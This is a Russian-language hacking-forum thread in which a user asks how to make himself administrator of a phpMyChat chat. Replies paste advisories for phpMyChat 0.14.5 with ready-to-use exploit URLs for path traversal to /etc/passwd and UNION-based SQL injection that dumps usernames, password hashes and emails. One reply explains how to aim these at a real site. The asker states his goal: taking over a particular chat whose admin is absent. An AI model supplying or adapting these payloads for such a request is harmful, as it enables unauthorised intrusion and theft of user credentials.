• XSS.stack #1 – первый литературный журнал от юзеров форума

phpmychat

К.е.Н

RAID-массив
Пользователь
Регистрация
21.07.2005
Сообщения
82
Реакции
0
как в phpmychat можно себя админом прописать.И раскажите о других уязвимостях
 
Раз секлеб:
Код:
SQL-инъекция в сценарии setup.php3 в phpMyChat
Программа: phpMyChat 0.14.5

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Обнаружена уязвимость в phpMyChat. Удаленный пользователь может выполнить произвольный SQL код на уязвимой системе.

Удаленный пользователь может вызвать файл setup.php3 и выполнить произвольный SQL код на уязвимой системе. Пример эксплоита:

http://www.milw0rm.com/id.php?id=703

URL производителя: http://phpmychat.sourceforge.net

Решение: Решение не существует на данный момент.

Два секлеб:
Код:
Множественные уязвимости в phpMyChat
Программа: phpMyChat 0.14.5

Опасность: Средняя

Наличие эксплоита: Да

Описание: Обнаружены обход ограничений, XSS, раскрытие системной информации, раскрытие важных данных пользователей, SQL-инъекция в phpMyChat.

1. Обход аутентификации. Удаленный атакующий может послать специально сформированный POST запрос к файлу edituser.php3, в котором значение “do_not_login” равно “false”.
2. Обход каталога в admin.php3. Удаленный атакующий может воспользоваться этой уязвимостью и получить доступ к важной информации на системе.
3. Межсайтовое выполнение сценариев. Данные, передаваемые параметру “C” в сценарии input.php3 не проверяются, что позволяет атакующему выполнить произвольный сценарий в браузере жертвы.
4. SQL-инъекция. Различные параметры в сценарии usersL.php3 не проверяются. Удаленный атакующий может управлять SQL запросами.

Пример/Эксплоит:
http://[TARGET]/chat/admin.php3?From=admin.php3&What= Body&L=russian&user=[USE R]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00
http://[TARGET]/chat/admin.php3?From=admin.php3&What =Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/
http://[TARGET]/chat/admin.php3?From=admin.php3&What =[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1
http://[TARGET]/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/ passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&s
http://[TARGET]/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
http://[TARGET]/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
http://[TARGET]/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20email,null,null,null %20FROM%20%20c_reg_users%20/*

URL производителя: http://www.phpheaven.net/projects/phpmychat/rubrique4.html

Решение: Решение отсутствует
 
Да я это уже давно знаю.Но как это использовать объясните плизз.
 
[TARGET] - сайт где установлен скрипт. Например если это site.ru, то запрос может выглядеть так:
Код:
http://site.ru/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20email,null,null,null %20FROM%20%20c_reg_users%20/*
 
http://[TARGET]/chat/admin.php3?From=admin.php3&What =[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1
А вместо вайл что вставлять?
Вместо юзер мой ник или админа и чей хеш?
Если хеш админа то где я его возьму?
 
Админ на том чате уже пару лет не появлялся:nono: .Но в админку заходят под ником админа .Ник знет 1 чел но он его не говорит:crazy: .Как можно узнать ник админа?Или прописать себя админом? :help:
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх